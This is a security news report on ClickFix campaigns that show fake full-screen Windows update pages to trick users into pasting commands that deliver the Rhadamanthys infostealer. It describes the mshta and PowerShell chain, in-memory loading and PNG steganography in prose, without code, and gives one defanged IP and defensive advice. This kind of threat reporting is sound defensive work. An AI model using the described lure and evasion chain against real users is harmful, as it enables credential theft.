ClickFix Attacks Surge: Fake Windows Updates Deliver Rhadamanthys Infostealer Globally

Fake Windows updates have entered a new cycle of ClickFix campaigns, according to researchers at Huntress. Attackers are increasingly replacing bot-check pages with full-screen blue windows that perfectly mimic the Windows update interface. As Microsoft stresses in the opening paragraph, ClickFix has become the most widespread method of initial access — a tactic now adopted by groups across a wide spectrum of skill levels.

The attacks begin when a victim visits a malicious site that forces the browser into full-screen mode and displays a page visually indistinguishable from a legitimate Windows update screen. The user is then urged to perform a “critical update” manually, following the classic ClickFix pattern: open the Run dialog with Win+R, paste a prepared command, and execute it. At that moment, the victim unknowingly triggers the malicious chain themselves.

The command launches mshta.exe with a URL whose second IP octet is always encoded in hexadecimal. PowerShell then retrieves a block of .NET code which, once decrypted, is loaded directly into memory and hands execution to the next stage. This next component is a .NET module responsible for covert malware delivery via steganography. It extracts an encrypted Donut shellcode payload from the pixel data of PNG files, using individual color channels to reconstruct the final malicious content — a technique that helps evade signature-based detection systems.

According to Huntress, between 29 September and 30 October 2025, the team investigated 76 incidents affecting organizations in the United States, across the EMEA region, and in APJ. One case involved traffic to 141.98.80[.]175. In every instance, the chain relied on URLs with hexadecimal second octets that pointed to the steganographic loader. Researchers found Russian-language comments in the source code of the spoofed update pages, though the campaign’s authors remain unidentified.

Despite the 13 November Operation Endgame actions targeting Rhadamanthys infrastructure, the fake-update sites continued to operate at least until 19 November. All identified lures referenced the same structure of hex-encoded URLs previously associated with Rhadamanthys delivery, even though the malware itself was no longer hosted there. Investigators warn, however, that the infrastructure may shift rapidly.

Both variants of the Windows-update lures ultimately delivered Rhadamanthys, a credential-stealing infostealer. To reduce the risk of such attacks, organizations are advised to block or restrict access to the Run dialog, educate employees about ClickFix-style social-engineering techniques, and remind them that no legitimate Windows update ever requires manually pasting commands. EDR-level defensive tools can also help detect cases where explorer.exe spawns mshta.exe, powershell.exe, or other executables with atypical parameters.

Support Our Threat Intelligence

If you find our technology report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy